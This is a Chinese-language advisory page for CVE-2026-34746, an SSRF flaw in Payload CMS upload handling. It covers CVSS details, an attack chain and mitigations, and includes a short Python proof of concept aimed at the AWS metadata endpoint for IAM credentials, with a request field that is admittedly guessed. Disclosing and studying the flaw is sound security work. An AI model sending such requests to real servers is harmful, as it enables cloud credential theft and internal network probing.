CVE-2026-34746 CVSS 7.7 高危

CVE-2026-34746 Payload CMS SSRF漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34746

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Payload CMS

漏洞概述

Payload CMS是一个免费开源的无头内容管理系统。在3.79.1之前的版本中，系统存在一个由于认证不严导致的服务器端请求伪造（SSRF）漏洞。拥有创建或更新权限的认证用户，可利用上传功能中的缺陷，诱导服务器向内部网络或任意外部URL发起出站HTTP请求。由于该漏洞无需用户交互且机密性影响高，攻击者可借此探测内网服务或窃取敏感元数据。

技术细节

该漏洞的核心在于Payload CMS在处理上传集合时，未能对用户输入的URL进行严格的校验和过滤。攻击者首先需要获取一个具有创建或更新权限的低权限账户。随后，通过构造特定的HTTP请求，将恶意URL注入到上传功能的参数中。由于服务器端信任该输入并直接发起请求，导致SSRF。攻击者可以利用此漏洞向内网地址（如127.0.0.1、内网网段）发送请求，从而探测未授权暴露的服务、读取本地文件（若支持file://协议）或访问云平台元数据服务（如AWS的169.254.169.254）。鉴于CVSS向量中S:C（范围改变），该攻击不仅影响应用本身，还可能波及同一基础设施下的其他系统，造成严重的数据泄露风险。

攻击链分析

STEP 1

信息收集

识别目标系统为Payload CMS，且版本低于3.79.1。

STEP 2

获取凭证

攻击者注册或窃取一个具有创建或更新权限的低权限账户。

STEP 3

漏洞利用

构造包含恶意URL的POST请求发送至上传接口，触发SSRF。

STEP 4

数据回传

服务器向内网或外部攻击者指定地址发起请求，泄露敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the Payload CMS instance
target_url = "http://target-cms.com/api/uploads"

# Malicious URL (e.g., internal metadata service)
ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Authentication token (Required as per PR:L)
headers = {
    "Authorization": "Bearer <VALID_JWT_TOKEN>",
    "Content-Type": "application/json"
}

# Payload data structure triggering the SSRF
# The specific field 'url' depends on the actual API implementation for uploads
data = {
    "file": "exploit.jpg",
    "url": ssrf_payload
}

# Send the malicious request
response = requests.post(target_url, json=data, headers=headers)

if response.status_code == 200:
    print("[+] SSRF request sent successfully.")
else:
    print("[-] Failed to send request.")

影响范围

Payload CMS < 3.79.1

防御指南

临时缓解措施

如果无法立即升级软件，建议在网络网关处配置防火墙规则，阻断服务器向非业务必需的内网段（如127.0.0.1、169.254.169.254等）发起的连接。同时，严格审查并收缩用户权限，移除非管理员用户的上传功能访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表